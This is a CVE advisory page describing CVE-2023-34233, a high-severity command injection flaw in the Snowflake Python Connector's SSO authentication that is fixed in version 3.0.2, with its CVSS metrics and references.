Snowflake Python Connector vulnerable to Command Injection
CVE-2023-34233

8.8HIGH

Key Information:

Vendor

snowflakedb

Status
snowflake-connector-python
Vendor
CVE Published:
8 June 2023

What is CVE-2023-34233?

The Snowflake Connector for Python, used to connect Python applications to Snowflake, is susceptible to command injection through single sign-on (SSO) browser URL authentication in versions prior to 3.0.2. An attacker can exploit this vulnerability by creating a malicious publicly accessible server that responds to a SSO URL with a harmful payload. If a user visits this crafted URL, it can lead to remote code execution on the user's local machine. Implementing URL whitelisting and leveraging anti-phishing resources are effective measures to mitigate this threat. Version 3.0.2 addresses this vulnerability with a patch.

Affected Version(s)

snowflake-connector-python < 3.0.2

References

https://github.com/snowflakedb/snowflake-connector-python...
x_refsource_CONFIRM
https://github.com/snowflakedb/snowflake-connector-python...
x_refsource_MISC
https://github.com/snowflakedb/snowflake-connector-python...
x_refsource_MISC

CVSS V3.1

Score:
8.8
Severity:
HIGH
Confidentiality:
High
Integrity:
High
Availability:
High
Attack Vector:
Network
Attack Complexity:
Low
Privileges Required:
None
User Interaction:
Required
Scope:
Unchanged

Timeline

  • Vulnerability published

  • Vulnerability Reserved

.